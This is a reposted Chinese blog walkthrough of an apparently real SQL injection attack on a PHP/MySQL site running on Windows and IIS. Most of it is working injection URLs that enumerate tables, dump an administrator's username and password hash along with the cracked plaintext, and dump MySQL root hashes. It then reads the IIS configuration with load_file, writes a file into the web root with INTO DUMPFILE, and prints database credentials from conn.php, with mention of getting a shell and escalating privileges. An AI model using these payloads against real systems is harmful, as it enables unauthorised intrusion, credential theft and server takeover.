转载自:http://hi.baidu.com/micropoor

//特别篇-------实战篇 

//2011-11-17 星期四
//环境:win+php+mysql 

http://www.Micropoor.com/answer_view.php?id=10291 
http://www.Micropoor.com/answer_view.php?id=10291' //有注入  如图: 
//常理走:报表。现在mysql几乎都是高级版本。所以一般就不猜测它的版本了。  
http://www.Micropoor.com/answer_view.php?id=10291%20and%202=4%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--   如图:

482 
//上火狐,报表. 如图 
http://www.Micropoor.com/answer_view.php?id=10291%20and%201=2%20union%20select%201,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%20from%20informati on_schema.tables%20where%20table_schema=database()  



//表                             结                             构                            :  
 
admuser,admuser2,adn_anuncios,adn_foros,adn_foros_nuevos,adn_malas_palabras,adn_mensajes,adn_mensajes_nuevos,adn_paginas,adn_usuarios,answer,attach,book,case_history,classes,classes2,click,docs,export,getwell,lyb,lyb2,member,news,pinglun,proclasses,production,soft,vote,vote_sav e,zhidao
字段应该是user,username。之类的。还是爆吧。  
http://www.Micropoor.com/answer_view.php?id=10291%20and%201=2%20union%20select%201,2,3,group_concat(column_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%20from%20infor mation_schema.columns%20where%20table_name=0x61646D75736572 
//如图  


 

/* 
id,username,password,id,username,password  
*/ 
剩下的就是查询了。248  
http://www.Micropoor.com/answer_view.php?id=10291%20and%201=2%20union%20select%201,username,3,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%20from%20admuser 
//如图:  

User:       chen  
 
Password: 2a0e926d20b06f13601c729602a9f24e  
 
解密:         chen2011  
 
//问题出现了。后台找不到。 如图:

 


http://www.Micropoor.com/manage/  //后来得知,是假的 

/*陷入僵持了。  
账号密码都出来了。后台找不到。想了想细节问题。我没判断什么用户,什么权限。以及数据库版本。  
*/ 
http://www.Micropoor.com/answer_view.php?id=10291%20and%202=4%20union%20select%201,user(),3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21-- 
//如图:  
 


root! 
判断可否写入:  
http://www.Micropoor.com/answer_view.php?id=10291and(selectcount(*)fromMySQL.user)>0-- 
//如图: 

 

//回显正常:剩下的就是知道路径的问题了。数据库路径先看看。 
http://www.Micropoor.com/pinglun.php?id=7387%20and%201=2%20union%20select%200,unhex%28hex%28concat%280x5e5e5e,@@basedir,0x5e5e5e%29%29%29,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20-- 
//利用不上。   如图  

 

想到这,刚才直接爆库可以直接高级方式:  
http://www.Micropoor.com/pinglun.php?id=7387%20and%201=2%20union%20select%200,unhex(hex(concat(0x5e5e5e,group_concat(table_schema,0x3a,table_name),0x5e5e5e))),0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20(select%20*%20from%20information_schema.tables%20order%20by%20tab le_schema%20limit%200,50)%20t%20%20-- 
//如图:  




//继续爆 
http://www.Micropoor.com/pinglun.php?id=7387%20and%201=2%20union%20select%200,unhex(hex(concat(0x5e5e5e,group_concat(user,0x3a,password),0x5e5e5e))),0,0,0,0,0,0,0,0,0,0,0,0,0,0%2 0from%20(select%20*%20from%20mysql.user%20order%20by%20user%20limit%200,50)%20t %20%20-- 
//如图  



 

Root爆出来了。很遗憾。没有破解出来。  
那么就要想到load_file函数了。  
//参考Php安全新闻早8点(2011-11-13 星期日) 
//http://hi.baidu.com/micropoor/blog/item/953acb6d896a6c7d0c33fac9.html 
既然要load_file 就要查看magic_quotes_gpc 是off还是on了 
//如图: 


没有报错。是off。  
既然是win系统,那么不是阿帕奇,就是iis。根据返回来看,是iis。那就读配置文件。  
http://www.Micropoor.com/pinglun.php?id=7387%20and%201=2%20union%20select%200,unhex(hex(concat(0x5e5e5e,load_file(0x633a5c77696e646f77735c73797374656d33325c696e657473727 65c4d657461426173652e786d6c),0x5e5e5e))),0,0,0,0,0,0,0,0,0,0,0,0,0,0%20--  
注意Concat函数!  
//参考php安全新闻Concat函数利用 
//如图: 


/*返回正确,说明读取成功。看源码!  
路径:D:\web\Micropoor  
开始写入! 
*/ 
http://www.Micropoor.com/pinglun.php?id=7387%20and%201=2%20union%20select%200,concat(char(116),char(101),char(115),char(116),char(13),char(10)),0,0,0,0,0,0,0,0,0,0,0,0,0,0%20into%20 dumpfile%20'd:%5C%5Cweb%5C%5CMicropoor%5C%5C1.txt'-- 
//如图: 

/* 
写入成功,拿shell。提权。  
D:/web/Micropoor/conn.php 配置文件  
*/ 
$Host="localhost";  
$Database="Micropoor";  
$DbaUser     ="root";  
$DbaPassword="Micropoor";  
//如图: 

结论:安全往往是基础开始.